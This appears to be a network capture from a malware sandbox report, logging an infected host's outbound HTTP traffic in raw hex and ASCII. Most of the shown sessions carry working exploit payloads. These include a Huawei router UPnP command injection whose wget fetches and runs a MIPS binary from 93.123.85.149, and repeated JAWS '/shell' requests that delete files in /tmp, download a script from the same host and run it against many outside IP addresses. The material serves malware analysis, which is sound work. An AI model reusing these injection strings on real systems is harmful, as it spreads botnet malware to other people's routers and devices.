                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:06.626494884 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:25.823788881 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            217192.168.2.2340188154.213.118.5780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:48.000339031 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:48.334759951 CET721INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 22:28:42 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 566
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            218192.168.2.233490665.25.201.9080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.478184938 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:49.620527029 CET500INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 349
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:31:49 GMT
                                                            Server: HTTP Server
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            219192.168.2.2338908159.223.194.13680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.498703003 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:49.656755924 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            220192.168.2.233843013.91.138.12780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.499485970 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            221192.168.2.2347448163.5.154.2380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.533514977 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:49.727318048 CET495INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:49 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 301
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            222192.168.2.235635213.225.26.17880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.538944006 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:49.737236023 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            223192.168.2.234318623.52.181.2880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.542653084 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:49.745528936 CET429INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 207
                                                            Expires: Fri, 26 Jan 2024 14:31:49 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:49 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 39 31 63 31 32 30 32 26 23 34 36 3b 31 37 30 36 32 37 39 35 30 39 26 23 34 36 3b 32 30 63 63 33 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;d91c1202&#46;1706279509&#46;20cc3e</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            224192.168.2.2351022212.51.159.2080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.555600882 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:49.770144939 CET115INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/plain; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: 400 Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            225192.168.2.2344710191.101.131.2180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.579488993 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            226192.168.2.233299013.239.176.6880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.632193089 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:49.923357010 CET467INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.14.0 (Ubuntu)
                                                            Date: Fri, 26 Jan 2024 14:31:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 194
                                                            Connection: keep-alive
                                                            Location: http://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            227192.168.2.235556450.62.222.15080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:49.642386913 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:49.786691904 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:49 GMT
                                                            Server: Apache
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Accept-Ranges: bytes
                                                            Vary: Accept-Encoding
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 